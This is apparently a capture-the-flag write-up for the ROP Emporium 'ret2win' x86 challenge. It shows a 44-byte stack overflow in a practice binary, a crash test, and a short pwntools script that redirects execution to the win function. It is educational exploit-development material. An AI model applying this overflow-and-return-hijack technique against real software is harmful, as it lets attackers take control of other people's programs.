#rop # ret2win x86 ## Triage  Like the website says, these challenges are based on ROPing so NX will be enbaled on all of these. ### Disassembly main function calls vulnerable call pwnme  pwnme function  ## Vulnerability In the pwnme function, 56 bytes are read into the user_input buff but the user_input buff is on the stack -0x2c (-44) bytes off from the return address. If we supply 44 bytes, the next 4 bytes will overflow the return address and we gain control of the program counter. Confirming the vulnerability: ```bash python -c 'print "A"*44+"BBBB"' | strace ./ret2win32 ``` ```bash --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} --- +++ killed by SIGSEGV (core dumped) +++ [1] 3224389 done python -c 'print "A"*44+"BBBB"' | 3224390 segmentation fault (core dumped) strace ./ret2win32 ``` ## Exploit The binary contains a win function:  Setting the program counter to `0x804862c` will execute the win function ### Script ```python from pwn import * context.binary = elf = ELF("./ret2win32") payload = "A"*44 payload += p32(elf.sym['ret2win']) io = process("./ret2win32") io.sendline(payload) io.interactive() ``` ### Result ```bash [*] '/home/chris/ctfs/ropemporium/ret2win/x86/ret2win32' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) [+] Starting local process './ret2win32': pid 3244643 [*] Switching to interactive mode ret2win by ROP Emporium x86 For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer! What could possibly go wrong? You there, may I have your input please? And don't worry about null bytes, we're using read()! > Thank you! Well done! Here's your flag: ROPE{a_placeholder_32byte_flag!} [*] Got EOF while reading in interactive $ [*] Interrupted [*] Process './ret2win32' stopped with exit code -11 (SIGSEGV) (pid 3244643) ```